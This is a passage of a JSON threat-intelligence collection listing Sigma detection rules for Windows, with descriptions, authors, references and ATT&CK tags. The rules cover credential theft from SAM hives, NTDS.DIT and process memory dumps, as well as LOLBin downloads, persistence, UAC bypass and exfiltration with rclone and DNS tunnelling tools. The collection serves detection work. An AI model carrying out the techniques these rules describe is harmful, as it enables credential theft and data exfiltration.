"dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e8a95b5e-c891-46e2-b33a-93937d3abc31", "value": "Suspicious HH.EXE Execution" }, { "description": "Detects suspicious PowerShell scripts accessing SAM hives", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-29", "falsepositive": [ "Some rare backup scenarios", "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "filename": "proc_creation_win_powershell_sam_access.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/splinter_code/status/1420546784250769408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_sam_access.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1af57a4b-460a-4738-9034-db68b880c665", "value": "PowerShell SAM Copy" }, { "description": "Detects 
execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", "meta": { "author": "Thomas Patzke", "creation_date": "2019-01-16", "falsepositive": [ "NTDS maintenance" ], "filename": "proc_creation_win_ntdsutil_usage.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)" }, { "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", "meta": { "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-02-18", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", "https://twitter.com/shantanukhande/status/1229348874298388484", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", "https://twitter.com/Hexacorn/status/1224848930795552769", "https://twitter.com/Wietze/status/1542107456507203586", "https://twitter.com/SBousseaden/status/1167417096374050817", "https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml" ], "tags": [ "attack.defense-evasion", "attack.credential-access", "attack.t1036", "attack.t1003.001", "car.2013-05-009" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "646ea171-dded-4578-8a4d-65e9822892e3", "value": "Process Memory Dump Via Comsvcs.DLL" }, { "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.\nWhen the job runs on the system the command specified in the BITS job will be executed.\nThis can be abused by actors to create a backdoor within the system and for persistence.\nIt will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.\n", "meta": { "author": "Sreeman", "creation_date": "2020-10-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bitsadmin_potential_persistence.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml" ], "tags": [ "attack.defense-evasion", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", "value": "Monitoring For Persistence Via BITS" }, { "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_sdclt.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_sdclt.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", "value": "Potential UAC Bypass Via Sdclt.EXE" }, { "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", "meta": { "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", "creation_date": "2019-06-15", "falsepositive": [ "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist" ], "filename": "proc_creation_win_renamed_binary.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", "value": "Potential Defense Evasion Via Binary Rename" }, { "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", "meta": { "author": "frack113", "creation_date": "2022-03-12", "falsepositive": [ "Legitimate script" ], "filename": "proc_creation_win_susp_network_scan_loop.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://ss64.com/nt/for.html", "https://ss64.com/ps/foreach-object.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.discovery", "attack.t1018" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" 
], "type": "related-to" }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "value": "Suspicious Scan Loop Network" }, { "description": "Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-05-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_regsvr32_network_pattern.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/tccontre18/status/1480950986650832903", "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", "https://twitter.com/mrd0x/status/1461041276514623491", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "867356ee-9352-41c9-a8f2-1be690d78216", "value": "Potentially Suspicious Regsvr32 HTTP/FTP Pattern" }, { "description": "Detects the recovery of files from backups via \"wbadmin.exe\".\nAttackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2024-05-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wbadmin_restore_file.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery", 
"https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6fe4aa1e-0531-4510-8be2-782154b73b48", "value": "File Recovery From Backup Via Wbadmin.EXE" }, { "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", "meta": { "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "creation_date": "2023-03-05", "falsepositive": [ "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], "filename": "proc_creation_win_certmgr_certificate_installation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certmgr_certificate_installation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff992eac-6449-4c60-8c1d-91c9722a1d48", "value": "New Root Certificate Installed Via CertMgr.EXE" }, { "description": "Detects a suspicious program execution in Outlook temp folder", "meta": { "author": "Florian Roth (Nextron 
Systems)", "creation_date": "2019-10-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_outlook_execution_from_temp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "value": "Suspicious Execution From Outlook Temporary Folder" }, { "description": "Detects when a user downloads a file by using CertOC.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certoc_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", "value": "File Download via CertOC.EXE" }, { "description": "Detects addition of users to the local Remote Desktop Users group via \"Net\" or \"Add-LocalGroupMember\".", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-12-06", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml", "level": "high", "logsource.category": 
"process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml" ], "tags": [ "attack.persistence", "attack.lateral-movement", "attack.t1133", "attack.t1136.001", "attack.t1021.001" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "value": "User Added to Remote Desktop Users Group" }, { "description": "Detects the execution of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", "meta": { "author": "frack113", "creation_date": "2022-05-16", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_lolbin_ttdinject.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "value": "Use of TTDInject.exe" }, { "description": "Detects the execution 
of whoami, which is often used by attackers after exploitation / privilege escalation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-08-13", "falsepositive": [ "Admin activity", "Scripts and administrative tools used in the monitored environment", "Monitoring activity" ], "filename": "proc_creation_win_whoami_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", "value": "Whoami Utility Execution" }, { "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) 
via command line", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2022-08-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://h.43z.one/ipconverter/", "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "56d19cb4-6414-4769-9644-1ed35ffbb148", "value": "Obfuscated IP Via CLI" }, { "description": "Detects the use of SDelete to erase a file not the free space", "meta": { "author": "frack113", "creation_date": "2021-06-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sysinternals_sdelete.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_sdelete.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a4824fca-976f-4964-b334-0621379e84c4", "value": "Potential File Overwrite Via Sysinternals SDelete" }, { "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "creation_date": "2019-01-09", "falsepositive": [ "Administrative scripts" ], "filename": "proc_creation_win_powershell_susp_ps_appdata.yml", "level": "medium", "logsource.category": 
"process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", "https://twitter.com/JohnLaTwC/status/1082851155481288706", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", "value": "PowerShell Script Run in AppData" }, { "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-05-22", "falsepositive": [ "Weird admins that rename their tools", "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml" ], "tags": [ "attack.resource-development", "attack.t1587.001" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "207b0396-3689-42d9-8399-4222658efc99", "value": "Potential Privilege Escalation To LOCAL SYSTEM" }, { "description": "Detects 
usage of \"MSOHTMED\" to download arbitrary files", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msohtmed_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msohtmed_download.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", "value": "Arbitrary File Download Via MSOHTMED.EXE" }, { "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", "meta": { "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", "creation_date": "2021-09-30", "falsepositive": [ "DataSvcUtil.exe being used may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", "https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", "https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", "https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" ], "tags": [ "attack.exfiltration", "attack.t1567" ] }, "related": [ { "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe" }, { "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-06-22", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_sysprep_appdata.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", "value": "Sysprep on AppData Folder" }, { "description": "Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)", "meta": { "author": "Andreas Hunkeler (@Karneades), Florian Roth", "creation_date": "2021-12-17", "falsepositive": [ "Legitimate calls to system binaries", "Company specific internal usage" ], "filename": "proc_creation_win_java_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_susp_child_process.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation" ] }, "uuid": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "value": "Suspicious Processes Spawned by Java.EXE" }, { "description": "Well-known DNS Exfiltration tools execution", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/iagox86/dnscat2", "https://github.com/yarrick/iodine", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.001", "attack.command-and-control", 
"attack.t1071.004", "attack.t1132.001" ] }, "related": [ { "dest-uuid": "79a4052e-1a89-4b09-aea6-51f1d11fe19c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", "value": "DNS Exfiltration and Tunneling Tools Execution" }, { "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", "meta": { "author": "frack113", "creation_date": "2022-05-07", "falsepositive": [ "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" ], "filename": "proc_creation_win_lolbin_ie4uinit.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", "value": "Ie4uinit Lolbin Use From Invalid Path" }, { "description": "Detects execution of RClone utility for exfiltration as used by various ransomware strains like REvil, Conti, FiveHands, etc", "meta": { "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC 
Group", "creation_date": "2021-05-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_rclone_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.002" ] }, "related": [ { "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "value": "PUA - Rclone Execution" }, { "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", "meta": { "author": "Markus Neis, Florian Roth", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", "https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html", "https://atomicredteam.io/defense-evasion/T1220/", "https://twitter.com/mattifestation/status/986280382042595328", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1047", "attack.t1220", 
